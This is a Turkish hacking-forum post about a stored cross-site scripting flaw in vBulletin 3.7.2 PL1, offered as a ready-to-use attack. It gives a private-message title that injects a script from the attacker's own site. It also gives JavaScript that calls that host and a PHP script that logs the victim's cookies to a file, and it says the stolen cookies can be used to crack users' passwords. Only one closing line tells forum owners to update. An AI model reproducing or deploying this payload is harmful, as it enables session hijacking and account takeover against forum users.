CryptoSuite.Org

Geri git   CryptoSuite.ORG || The Best Encryption Platform Of The World > Hack & Security > HackTube

HackTube Tüm Videolu ve Resimli Anlatımlarının Bulunduğu Bölüm

Konu Bilgileri
Konu Başlığı
Vbulletin 3.7.2'de Açık
Konudaki Cevap Sayısı
0
Şuan Bu Konuyu Görüntüleyenler
 
Görüntülenme Sayısı
193

Yeni Konu aç Cevapla
 
LinkBack Seçenekler Stil
Alt 06-24-09, 07:51   #1 (permalink)
Member
 

User ID : 1918
Messages : 9
Threads : 4
Thanks : 2
Rat : Turkojan
ZeeK isimli Üye şimdilik offline konumundadır
CryptoSuite.Org
Standart Vbulletin 3.7.2'de Açık

Vbulletin 3.7.2 PL1'de Açık!
___________________

Popüler forum scriptinde bulunan yeni bir açık ile aşağıdaki şekilde herhang bir kullanıcıya pm gönderdiğinizde, alıcı kullanıcının cookieleri sizin sunucunuzda saklanacaktır.

Kullanımı: Şu başlıkla bir pm gönderin:
--></script><script src="http://www.siteadresiniz.com/vbcal.js"></script><!--

Yukarıdaki satırı tam olarak girin eksik-fazla yok.

Ve siteadresiniz.com da vbcal.js dosyasını şu şekilde oluşturun:

Kod:
var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
XmlHttp.open("GET","http://www.siteadresiniz.com/vbcal-kayit.php",false);
XmlHttp.setRequestHeader("Host","attacker");
XmlHttp.send();
Ve de siteadresiniz.com/vbcal-kayit.php dosyası oluşturun şu kodlarla:

Kod:
<?
$all_cookies = "";
foreach ($_COOKIE as $cookie_name => $cookie_value) {
        $all_cookies .= "$cookie_name=$cookie_value, ";
}
rtrim($all_cookies, ", ");
file_put_contents("iplog.txt", "COOKIES: ".$all_cookies."\n", 
FILE_APPEND);
?>
Php dosyanızı kayıt ettikten sonra iplog.txt dosyasına chmod 755 yapmayı unutmayın.

İşleyişi: Pm gönderdiğiniz kullanıcı sizden gelen mesajı okuduğunda javascript ile siteadresiniz.com/vbcal-kayit.php yi çalıştıracak, o da saldırı yaptığınız domaindeki cookie bilgilerini alıp iplog.txt dosyasına aktaracak. Ardından aldığınız verileri kullanıp kullanıcının şifresini kurabilirsiniz.

Vbulletin sahipleri güncel versiyonu yüklerseniz sorun kalmayacaktır..

Konu ZeeK tarafından (06-25-09 Saat 04:48 ) değiştirilmiştir..
  Alıntı ile Cevapla
Cevapla

Bookmarks


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık



WEZ Format +3. Şuan Saat: 18:27.


5651 Sayılı Kanun’un 8. maddesine ve T.C.K’nın 125. maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur.
Sitemiz, hukuka, yasalara, telif haklarına ve kişilik haklarına saygılı olmayı amaç edinmiştir. Sitemiz, 5651 sayılı yasada tanımlanan “yer sağlayıcı” olarak hizmet vermektedir. İlgili yasaya göre, site yönetiminin hukuka aykırı içerikleri kontrol etme yükümlülüğü YOKTUR!Bu sebeple, sitemiz “uyar ve kaldır” prensibini benimsemiştir. Telif hakkına konu olan eserlerin yasal olmayan bir biçimde paylaşıldığını ve yasal haklarının çiğnendiğini düşünen hak sahipleri veya meslek birlikleri, BURADAN bize ulaşabilirler. Buraya ulaşan talep ve şikayetler Hukuk Müşavirimiz tarafından incelenecek, şikayet yerinde görüldüğü takdirde ihlal olduğu düşünülen içerikler sitemizden kaldırılacaktır.Ayrıca, mahkemelerden talep gelmesi halinde hukuka aykırı içerik üreten ve hukuka aykırı paylaşımda bulunan üyelerin tespiti için gerekli teknik veriler sağlanacaktır.Sitemiz üzerinden yapılan satış ilanları sadece firmalar için olup, kötüye kullanımından doğacak hasarlardan kesinlikle sitemiz sorumlu tutulamaz.